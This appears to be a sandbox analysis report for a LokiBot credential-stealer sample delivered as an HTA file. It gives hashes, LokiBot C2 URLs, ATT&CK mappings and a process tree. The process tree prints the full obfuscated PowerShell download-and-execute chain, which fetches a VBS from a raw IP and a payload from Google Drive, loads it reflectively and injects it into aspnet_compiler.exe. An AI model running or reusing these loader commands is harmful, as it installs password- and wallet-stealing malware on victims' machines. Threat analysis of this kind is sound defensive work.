lokibot | 3b5f33baf9dbcbe033909735e6238ecf8c3f5aaf915d7298157fb07e034cf2bb

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
08-11-2024 07:33

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

seethegoodthingswhicgivenyoubest.hta
Size

206KB
MD5

ee06f92a6abcd0b214c3251740547dbe
SHA1

6c36d8fa208e1c6f97272ab9f14b4e6b1ff17f3b
SHA256

3b5f33baf9dbcbe033909735e6238ecf8c3f5aaf915d7298157fb07e034cf2bb
SHA512

8d198174ebef3ad98944261cff5eafa079557ca5fda0bfdd340d193eba49e306707f331586bf321ebdb401d40df645de0f411dd1d6592854c3730f3fdf54088b
SSDEEP

48:4FhWsTR/F7gNqXfgaEJK4RJcB458p2ybuzkyq88oCxL/RNOeugGr4BJSFJkvhNcm:43F97/E1RXqfbutqSCxL/Rgeb4Frh/Q

Score

10^/10

lokibot collection defense_evasion discovery execution spyware stealer trojan

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

exe.dropper

https://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j63Ll1t2StVgGxbSt0

Extracted

Family

lokibot

http://94.156.177.220/logs/five/fre.php

http://kbfvzoboss.bid/alien/fre.php

http://alphastand.trade/alien/fre.php

http://alphastand.win/alien/fre.php

http://alphastand.top/alien/fre.php

Signatures

Lokibot
Lokibot is a Password and CryptoCoin Wallet Stealer.
trojan spyware stealer lokibot
Lokibot family
lokibot
Blocklisted process makes network request 4 IoCs

Processes:

powErshEll.eXepowershell.exe

flow pid process

15 3708 powErshEll.eXe
20 2884 powershell.exe
22 2884 powershell.exe
30 2884 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exe

pid process

2884 powershell.exe
8 powershell.exe
Evasion via Device Credential Deployment 2 IoCs
defense_evasion execution

Processes:

powErshEll.eXepowershell.exe

pid process

3708 powErshEll.eXe
768 powershell.exe

flow	pid	process
15	3708	powErshEll.eXe
20	2884	powershell.exe
22	2884	powershell.exe
30	2884	powershell.exe

pid	process
2884	powershell.exe
8	powershell.exe

pid	process
3708	powErshEll.eXe
768	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

mshta.exeWScript.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	mshta.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Control Panel\International\Geo\Nation	WScript.exe

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

Processes:

aspnet_compiler.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_compiler.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	aspnet_compiler.exe
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_compiler.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

19 drive.google.com
20 drive.google.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.exe

description pid process target process

PID 2884 set thread context of 4040 2884 powershell.exe aspnet_compiler.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

flow	ioc
19	drive.google.com
20	drive.google.com

description	pid	process	target process
PID 2884 set thread context of 4040	2884	powershell.exe	aspnet_compiler.exe

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

csc.execvtres.exeWScript.exepowershell.exepowershell.exemshta.exepowErshEll.eXepowershell.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powErshEll.eXe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe

Modifies registry class 1 IoCs

Processes:

powErshEll.eXe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings powErshEll.eXe
Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powErshEll.eXepowershell.exepowershell.exepowershell.exe

pid process

3708 powErshEll.eXe
3708 powErshEll.eXe
768 powershell.exe
768 powershell.exe
8 powershell.exe
8 powershell.exe
2884 powershell.exe
2884 powershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000_Classes\Local Settings	powErshEll.eXe

pid	process
3708	powErshEll.eXe
3708	powErshEll.eXe
768	powershell.exe
768	powershell.exe
8	powershell.exe
8	powershell.exe
2884	powershell.exe
2884	powershell.exe

Suspicious use of AdjustPrivilegeToken 5 IoCs

Processes:

powErshEll.eXepowershell.exepowershell.exepowershell.exeaspnet_compiler.exe

description	pid	process
Token: SeDebugPrivilege	3708	powErshEll.eXe
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	8	powershell.exe
Token: SeDebugPrivilege	2884	powershell.exe
Token: SeDebugPrivilege	4040	aspnet_compiler.exe

Suspicious use of WriteProcessMemory 30 IoCs

Processes:

mshta.exepowErshEll.eXecsc.exeWScript.exepowershell.exepowershell.exe

description	pid	process	target process
PID 3200 wrote to memory of 3708	3200	mshta.exe	powErshEll.eXe
PID 3200 wrote to memory of 3708	3200	mshta.exe	powErshEll.eXe
PID 3200 wrote to memory of 3708	3200	mshta.exe	powErshEll.eXe
PID 3708 wrote to memory of 768	3708	powErshEll.eXe	powershell.exe
PID 3708 wrote to memory of 768	3708	powErshEll.eXe	powershell.exe
PID 3708 wrote to memory of 768	3708	powErshEll.eXe	powershell.exe
PID 3708 wrote to memory of 3692	3708	powErshEll.eXe	csc.exe
PID 3708 wrote to memory of 3692	3708	powErshEll.eXe	csc.exe
PID 3708 wrote to memory of 3692	3708	powErshEll.eXe	csc.exe
PID 3692 wrote to memory of 4424	3692	csc.exe	cvtres.exe
PID 3692 wrote to memory of 4424	3692	csc.exe	cvtres.exe
PID 3692 wrote to memory of 4424	3692	csc.exe	cvtres.exe
PID 3708 wrote to memory of 884	3708	powErshEll.eXe	WScript.exe
PID 3708 wrote to memory of 884	3708	powErshEll.eXe	WScript.exe
PID 3708 wrote to memory of 884	3708	powErshEll.eXe	WScript.exe
PID 884 wrote to memory of 8	884	WScript.exe	powershell.exe
PID 884 wrote to memory of 8	884	WScript.exe	powershell.exe
PID 884 wrote to memory of 8	884	WScript.exe	powershell.exe
PID 8 wrote to memory of 2884	8	powershell.exe	powershell.exe
PID 8 wrote to memory of 2884	8	powershell.exe	powershell.exe
PID 8 wrote to memory of 2884	8	powershell.exe	powershell.exe
PID 2884 wrote to memory of 4040	2884	powershell.exe	aspnet_compiler.exe
PID 2884 wrote to memory of 4040	2884	powershell.exe	aspnet_compiler.exe
PID 2884 wrote to memory of 4040	2884	powershell.exe	aspnet_compiler.exe
PID 2884 wrote to memory of 4040	2884	powershell.exe	aspnet_compiler.exe
PID 2884 wrote to memory of 4040	2884	powershell.exe	aspnet_compiler.exe
PID 2884 wrote to memory of 4040	2884	powershell.exe	aspnet_compiler.exe
PID 2884 wrote to memory of 4040	2884	powershell.exe	aspnet_compiler.exe
PID 2884 wrote to memory of 4040	2884	powershell.exe	aspnet_compiler.exe
PID 2884 wrote to memory of 4040	2884	powershell.exe	aspnet_compiler.exe

outlook_office_path 1 IoCs

Processes:

aspnet_compiler.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	aspnet_compiler.exe

outlook_win_path 1 IoCs

Processes:

aspnet_compiler.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-3227495264-2217614367-4027411560-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	aspnet_compiler.exe

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\seethegoodthingswhicgivenyoubest.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}
1⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3200
- C:\Windows\SysWOW64\winDOWspOweRsheLl\V1.0\powErshEll.eXe
  "C:\Windows\sySTEm32\winDOWspOweRsheLl\V1.0\powErshEll.eXe" "POweRsHeLl -eX ByPaSs -NOP -W 1 -C DevIceCredeNTiaLdepLOyMenT ; ieX($(Iex('[syStem.TExT.encodiNG]'+[ChAr]58+[chAr]0x3A+'Utf8.geTsTRing([sYsTem.CoNVErT]'+[ChAr]0x3A+[CHAr]0x3A+'FROmBaSe64StriNG('+[cHaR]0X22+'JFZ3SjZCMXZ5ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10eXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTUJlUmRlRklOaVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJsbU9uLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEhZTixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrck9jVWhmcU1VLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEdhLHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlaW1PUVplQ1NpWixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB2VCk7JyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlVwIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBuZ0tHbVcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFZ3SjZCMXZ5OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA0LjE2OC43LjUyLzEyMC9waWN0dXJld2l0aG1lYmFja3dpdGhuZXd0aGluZ3NncmVhdGZvcm1lLnRJRiIsIiRFblY6QVBQREFUQVxwaWN0dXJld2l0aG1lYmFja3dpdGhuZXd0aGluZ3NncmVhdGZvcm1lLnZicyIsMCwwKTtzdEFyVC1TTGVFcCgzKTtzdGFyVCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU52OkFQUERBVEFccGljdHVyZXdpdGhtZWJhY2t3aXRobmV3dGhpbmdzZ3JlYXRmb3JtZS52YnMi'+[CHar]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - System Location Discovery: System Language Discovery
  - Modifies registry class
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3708
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPaSs -NOP -W 1 -C DevIceCredeNTiaLdepLOyMenT
    3⤵
    - Evasion via Device Credential Deployment
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:768
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ijxj0w05\ijxj0w05.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:3692
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESE697.tmp" "c:\Users\Admin\AppData\Local\Temp\ijxj0w05\CSC2E105000D29D4F12ABCA4AA34ABF076.TMP"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4424
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\picturewithmebackwithnewthingsgreatforme.vbs"
    3⤵
    - Checks computer location settings
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:884
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JiAoICRlbnY6Y09Nc3BFY1s0LDI0LDI1XS1Kb0lOJycpKCAoJzU2dWltYWdlVXJsID0gdklPaHR0cHM6Ly9kcml2ZS5nb29nbGUuY29tL3VjP2V4cG9ydD1kb3dubG9hZCZpZD0xVXlIcXdyblhDbEtCSjNqJysnNjNMbDF0MlN0VmdHeGJTdDAgdklPOzU2dXdlYkNsaWVudCA9IE5ldy1PYmplY3QgU3knKydzdGVtLk5ldC5XZWJDbGllbnQ7NTZ1aScrJ21hZ2VCeXRlcyA9IDU2dXdlYkNsaWVudC5Eb3dubG9hZERhdGEoNTZ1aW1hZ2VVcmwpOzU2dWltYWdlVGV4dCA9ICcrJ1tTeXN0ZW0uVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKDU2dWltYWdlQnknKyd0ZXMpOzU2dXN0YXJ0RmxhZyA9IHZJTzw8QkFTRTY0X1NUQVJUPj52SU8nKyc7NTZ1ZW5kRmxhZyA9IHZJTzw8QkFTRTY0X0VORD4+dklPOzU2dXN0YXJ0SW5kZXggPSA1NnVpbWFnZVRleHQuSW5kZXhPZig1NnVzdGFydEZsYWcpOzU2dWVuZEluZGV4ID0gNTZ1aW1hZ2VUZXh0LkluZGV4T2YoNTZ1ZW5kRmxhZyk7NTZ1c3RhcnRJbmRleCAtZ2UgMCAtYW5kIDU2dWVuZCcrJ0luZGV4IC1ndCA1NnVzdGFydEluZGV4OzU2dXN0YXJ0SW5kZXggKz0gNTZ1c3RhcnRGbGFnLkxlbmd0aDs1NnViYXNlNjRMZW5ndGggPSA1NnVlbmRJbmQnKydleCAtIDU2dXN0YXJ0SW5kZXg7NTZ1YmFzZTY0Q29tbWFuZCA9IDU2dWltYWdlVGV4dC5TdWJzdHJpbmcoNTYnKyd1c3RhcnRJbmRleCwgNTZ1YmFzZTY0TGVuZ3RoKTs1NnViYXNlNjRSZXZlcnNlZCA9IC1qJysnb2luJysnICg1NnViYXNlNjRDb21tYW5kLlRvQ2hhckFycmF5KCkgNmlrIEZvckVhY2gtT2JqZWN0IHsgNTZ1XyB9KVstMS4uLSg1NicrJ3ViYXNlNicrJzRDb21tYW5kLkxlbmd0aCldOzU2dWNvbW1hbmRCeXRlcyA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoNTZ1YmFzZTY0UmV2ZXJzZWQpOzU2dWxvYWRlZEFzc2VtYmx5ID0gW1N5c3RlJysnbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6JysnTG9hZCg1NnVjb21tYW5kQnl0ZXMpOzU2dXZhaU1ldGhvZCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QodklPVkEnKydJJysndklPKTs1NnV2YWlNZXRob2QuSW52b2tlKDU2dW51bGwsIEAodklPdCcrJ3h0LktMR0xMLzAyMS8yNS43Ljg2MS40JysnMDEvLzpwdHRodklPLCAnKyd2SU9kZXNhdGl2YWRvdicrJ0lPLCB2SU9kZXNhdGl2YWRvdklPLCB2SU9kZXNhdGl2YWRvdklPLCB2SU9hc3BuZXRfY29tcCcrJ2lsZXJ2SU8sIHZJT2Rlc2F0aXZhZG92SU8sICcrJ3ZJT2Rlc2F0aXZhZG92SU8sdklPZGVzYXRpdmFkb3ZJTyx2SU9kZXNhdGl2YWRvdklPLHZJT2RlcycrJ2F0aXZhZG92SU8sdklPZGVzYXRpdmFkb3ZJTyx2SU9kZXNhdGl2YWRvdklPLHZJTzF2SU8sdklPZGVzYXRpdmFkJysnb3ZJTykpOycpLnJlcExhQ0UoKFtjaEFSXTU0K1tjaEFSXTEwNStbY2hBUl0xMDcpLFtzVFJpbmddW2NoQVJdMTI0KS5yZXBMYUNFKCd2SU8nLFtzVFJpbmddW2NoQVJdMzkpLnJlcExhQ0UoJzU2dScsJyQnKSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:8
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $env:cOMspEc[4,24,25]-JoIN'')( ('56uimageUrl = vIOhttps://drive.google.com/uc?export=download&id=1UyHqwrnXClKBJ3j'+'63Ll1t2StVgGxbSt0 vIO;56uwebClient = New-Object Sy'+'stem.Net.WebClient;56ui'+'mageBytes = 56uwebClient.DownloadData(56uimageUrl);56uimageText = '+'[System.Text.Encoding]::UTF8.GetString(56uimageBy'+'tes);56ustartFlag = vIO<<BASE64_START>>vIO'+';56uendFlag = vIO<<BASE64_END>>vIO;56ustartIndex = 56uimageText.IndexOf(56ustartFlag);56uendIndex = 56uimageText.IndexOf(56uendFlag);56ustartIndex -ge 0 -and 56uend'+'Index -gt 56ustartIndex;56ustartIndex += 56ustartFlag.Length;56ubase64Length = 56uendInd'+'ex - 56ustartIndex;56ubase64Command = 56uimageText.Substring(56'+'ustartIndex, 56ubase64Length);56ubase64Reversed = -j'+'oin'+' (56ubase64Command.ToCharArray() 6ik ForEach-Object { 56u_ })[-1..-(56'+'ubase6'+'4Command.Length)];56ucommandBytes = [System.Convert]::FromBase64String(56ubase64Reversed);56uloadedAssembly = [Syste'+'m.Reflection.Assembly]::'+'Load(56ucommandBytes);56uvaiMethod = [dnlib.IO.Home].GetMethod(vIOVA'+'I'+'vIO);56uvaiMethod.Invoke(56unull, @(vIOt'+'xt.KLGLL/021/25.7.861.4'+'01//:ptthvIO, '+'vIOdesativadov'+'IO, vIOdesativadovIO, vIOdesativadovIO, vIOaspnet_comp'+'ilervIO, vIOdesativadovIO, '+'vIOdesativadovIO,vIOdesativadovIO,vIOdesativadovIO,vIOdes'+'ativadovIO,vIOdesativadovIO,vIOdesativadovIO,vIO1vIO,vIOdesativad'+'ovIO));').repLaCE(([chAR]54+[chAR]105+[chAR]107),[sTRing][chAR]124).repLaCE('vIO',[sTRing][chAR]39).repLaCE('56u','$'))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2884
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        6⤵
        Accesses Microsoft Outlook profiles
        Suspicious use of AdjustPrivilegeToken
        outlook_office_path
        outlook_win_path
        
        PID:4040

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powErshEll.eXe.log

Filesize
2KB

MD5
968cb9309758126772781b83adb8a28f

SHA1
8da30e71accf186b2ba11da1797cf67f8f78b47c

SHA256
92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

SHA512
4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
12KB

MD5
c10fae435d5ae8924ff9dac726493906

SHA1
e4cb095bcd853edceb5542d77ddbf112b0748860

SHA256
8475894d7c800f3bb2234ed8de3980bb130c605753f82d5ef709b5923b9a74c9

SHA512
b3f048d10e7d4c0fdd057b515428a27434aa75e4f70ed493971f2e18a1dc8957243d174e2b7c63bbe5ab8a29e7998ddfb2f57354922af5e1b2944af8d501458a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
18KB

MD5
c3ced68379b1a665a99048f5e006b5d8

SHA1
bf8e51c65888af1c68b6b9a8c46476971f76c644

SHA256
7c1efb99e25c3cd4cef2f11a22d436f3d30095b9606bfd481cf33976d9f3f43f

SHA512
b64d588774049e0cbaf128796bcba2b24b2f7c8b458ca88ca355dd8aaa271e0f02dd641bcc44154fdadaf68b98ff8dbfda4a02a4a0dd05cfb58a0a011596edaf

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESE697.tmp

Filesize
1KB

MD5
6bf5706529c5d00edd2500cf11e3806f

SHA1
2f056d450edd8866c4149b82fad53276b779935e

SHA256
122fd2b7a5c681a4748fb4c2511d1ca078bd00f20b223b7bb0421ec25a02d7bb

SHA512
91b961644e39e590547393dcad92e09f10a36051bd1b4b60166bf4196f16ac9a87ccd31f91e795c6d9c0e7cbad4d404ab4107cef6c22bfbe2de8838ff397b05b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_b4so3qgb.jmi.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\ijxj0w05\ijxj0w05.dll

Filesize
3KB

MD5
700f196de8c4d90b7f533346be212aa5

SHA1
5589e36638ca7c3c4e1dc770e1c060c9153bbee2

SHA256
e5b8c978f9d5f7c649bc37468d6163566c52be21eef51f8afcbcf96b5442d2b3

SHA512
90fa1e29974237618c9ad1feb064b37e85c21dffe32d5fbb519e12b4be399c2a9cb4e7f1b057624c9b86cc14e2929ea7ddee67a7837c8cb6cd0b403f1bbdfd9d

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3

Filesize
46B

MD5
d898504a722bff1524134c6ab6a5eaa5

SHA1
e0fdc90c2ca2a0219c99d2758e68c18875a3e11e

SHA256
878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9

SHA512
26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3227495264-2217614367-4027411560-1000\0f5007522459c86e95ffcc62f32308f1_423fd5c7-8559-4b8c-bf1f-c9d05c9f0fd3

Filesize
46B

MD5
c07225d4e7d01d31042965f048728a0a

SHA1
69d70b340fd9f44c89adb9a2278df84faa9906b7

SHA256
8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a

SHA512
23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

Download Submit
C:\Users\Admin\AppData\Roaming\picturewithmebackwithnewthingsgreatforme.vbs

Filesize
138KB

MD5
6ee290a97ed7f5bcf1d264fcb5e1e4f7

SHA1
0851b61aa41328bac3ed7160eba1151a6faf2f0b

SHA256
b0d216e063b15e640ee73f15277cbd58b8d2a38ee96f61a8ad1e1bc36e400b88

SHA512
5aff6b07f5d77f548ece9bd2609177f0a742123ffd2f1861f0008dfb0f51d137a15a4c9436fc48c64b40c733bb550eb894e3a5bff3855b533262a06390b4034e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ijxj0w05\CSC2E105000D29D4F12ABCA4AA34ABF076.TMP

Filesize
652B

MD5
d44cdce2a4525b37f24acf9dc00770fa

SHA1
0818ad31aab26867886501dbb395970329c7a394

SHA256
8eade26c3ae052285cf5c2bed955da35a799da96cb6d50948482b42d2c19026c

SHA512
45ca0be87cee2b3b522dd097d8fd167b30449e9a5d3350339d6bc399289bec68c496e235752d72f521db0916ccd6847672a3f6042d5ed24f09b29d2286a47c5e

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ijxj0w05\ijxj0w05.0.cs

Filesize
473B

MD5
205f375dc3c53a766f92ffdea3687dde

SHA1
4d6aeadd2f24e149e06b17ecff040e835c78efa1

SHA256
25267d3b40367bbddf882619d418415a2c49bd26d964b6e2d5e214d92a8f87ab

SHA512
7708b1b37f3e2e156762f2704f4b70bf9c92473e1f8874ffc52e8f020a519a14f610b6e855059fa8dda425708e95a65ef8e925bf8ac998bb703b6770b7d2692f

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\ijxj0w05\ijxj0w05.cmdline

Filesize
369B

MD5
2cd6126afd7307c9c1feda568537160b

SHA1
3984995a486601213cc090307d0f5b60aee54d79

SHA256
f9384672b3cd5ded7f07d4c506ff52c36111667b6510a467980b52b8bb1fc73c

SHA512
6495b7d0b3ce26d6a3f08ec00129e110c7e105f1bcf11393c5333f6ad7acc6ea60308c5959f542f2b2e7f97367b19f81e1e27cfe913c5b0f14fb312c5f1302e6

Download Submit
memory/768-29-0x0000000006EA0000-0x0000000006ED2000-memory.dmp

Filesize
200KB

Download
memory/768-30-0x000000006E1C0000-0x000000006E20C000-memory.dmp

Filesize
304KB

Download
memory/768-40-0x00000000062C0000-0x00000000062DE000-memory.dmp

Filesize
120KB

Download
memory/768-41-0x0000000006F90000-0x0000000007033000-memory.dmp

Filesize
652KB

Download
memory/768-42-0x00000000076C0000-0x0000000007D3A000-memory.dmp

Filesize
6.5MB

Download
memory/768-43-0x0000000006F60000-0x0000000006F7A000-memory.dmp

Filesize
104KB

Download
memory/768-44-0x0000000007080000-0x000000000708A000-memory.dmp

Filesize
40KB

Download
memory/768-45-0x00000000072B0000-0x0000000007346000-memory.dmp

Filesize
600KB

Download
memory/768-46-0x0000000007220000-0x0000000007231000-memory.dmp

Filesize
68KB

Download
memory/768-47-0x0000000007250000-0x000000000725E000-memory.dmp

Filesize
56KB

Download
memory/768-48-0x0000000007260000-0x0000000007274000-memory.dmp

Filesize
80KB

Download
memory/768-49-0x0000000007370000-0x000000000738A000-memory.dmp

Filesize
104KB

Download
memory/768-50-0x00000000072A0000-0x00000000072A8000-memory.dmp

Filesize
32KB

Download
memory/2884-102-0x0000000007AC0000-0x0000000007B5C000-memory.dmp

Filesize
624KB

Download
memory/2884-101-0x00000000078C0000-0x0000000007A18000-memory.dmp

Filesize
1.3MB

Download
memory/3708-15-0x0000000005700000-0x0000000005766000-memory.dmp

Filesize
408KB

Download
memory/3708-81-0x0000000071900000-0x00000000720B0000-memory.dmp

Filesize
7.7MB

Download
